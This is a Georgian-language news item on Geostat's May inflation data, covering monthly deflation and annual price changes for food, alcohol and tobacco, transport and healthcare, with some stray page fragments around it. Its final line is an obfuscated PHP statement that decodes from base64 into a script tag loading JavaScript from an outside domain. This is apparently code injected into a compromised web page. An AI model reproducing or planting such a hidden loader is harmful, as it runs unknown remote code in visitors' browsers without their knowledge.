celsiusi
ავერსი შნაიდერი

 საქსტატის ინფორმაციით, მაისში წინა თვესთან შედარებით ინფლაციის დონემ -0.1%, ხოლო წლიური ინფლაციის დონემ 1.5% შეადგინა. აღსანიშნავია, რომ 2023 წლის იანვრიდან თვიურ ჭრილში ქვეყანაში დეფლაცია ფიქსირდება.

ყოველთვიური ინფლაციის მაჩვენებლის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ ჯგუფებზე:

სურსათი და უალკოჰოლო სასმელები: ჯგუფში ფასები შემცირდა 1.7%, რაც თვის ინფლაციაზე -0.62 პროცენტული პუნქტით აისახა. ფასები შემცირდა შემდეგ ქვეჯგუფებზე: რძე, ყველი და კვერცხი (-5.2%), ბოსტნეული და ბაღჩეული (-5%), პური და პურპროდუქტები (-2.3%). ამასთან, ფასები გაიზარდა ქვეჯგუფებზე: ხილი და ყურძენი (4%), ყავა, ჩაი და კაკაო (1.5%), თევზეული (1.1%), ხორცი და ხორცის პროდუქტები (1%). ალკოჰოლური სასმელებისა და თამბაქოს ჯგუფში ფასები გაიზარდა 1.6%-ით, რაც 0.12 პროცენტული პუნქტით აისახა მთლიან ინდექსზე.

რაც შეეხება წლიურ ინფლაციას, სურსათი და უალკოჰოლო სასმელების ჯგუფში ფასები გაიზარდა 3.3%-ით.
ფასები მომატებულია შემდეგ ქვეჯგუფებზე: ხორცი და ხორცის პროდუქტები (9.7%), რძე, ყველი და კვერცხი (9.3%), მინერალური და წყაროს წყალი, უალკოჰოლო სასმელები და ნატურალური წვენები (7.1%), ბოსტნეული და ბაღჩეული (6.3%), თევზეული (6%), პური და პურპროდუქტები (1.8%).

სხვადასხვა საქონელი და მომსახურების ჯგუფში ფასები გაიზარდა 18.4%-ით, რაც 0.92 პროცენტული პუნქტით აისახა წლიურ ინდექსზე. ალკოჰოლური სასმელები, თამბაქოს ჯგუფში ფასები გაიზარდა 7.1%-ით, რაც 0.48 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები მომატებულია როგორც ალკოჰოლური სასმელების (9.1%), ისე თამბაქოს ნაწარმის (5%) ქვეჯგუფებზე. წლიურად ფასები 12.9%-ით არის შემცირებული ტრანსპორტზე, რაც რაც 1.64 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები შემცირებულია პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე (-20.3%) და სატრანსპორტო საშუალებების შეძენაზე (-2%).

ჯანმრთელობის დაცვის ჯგუფში დაფიქსირდა ფასების 7.5%-იანი კლება, რაც -0.73 პროცენტული პუნქტით აისახა წლიურ ინდექსზე. ფასები შემცირდა სამედიცინო პროდუქციის, აპარატურისა და მოწყობილობის ქვეჯგუფზე (-18%). ამასთან, ფასები გაიზარდა ამბულატორიულ სამედიცინო მომსახურებაზე (12%) და საავადმყოფოების მომსახურებაზე (6.7%).

369
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");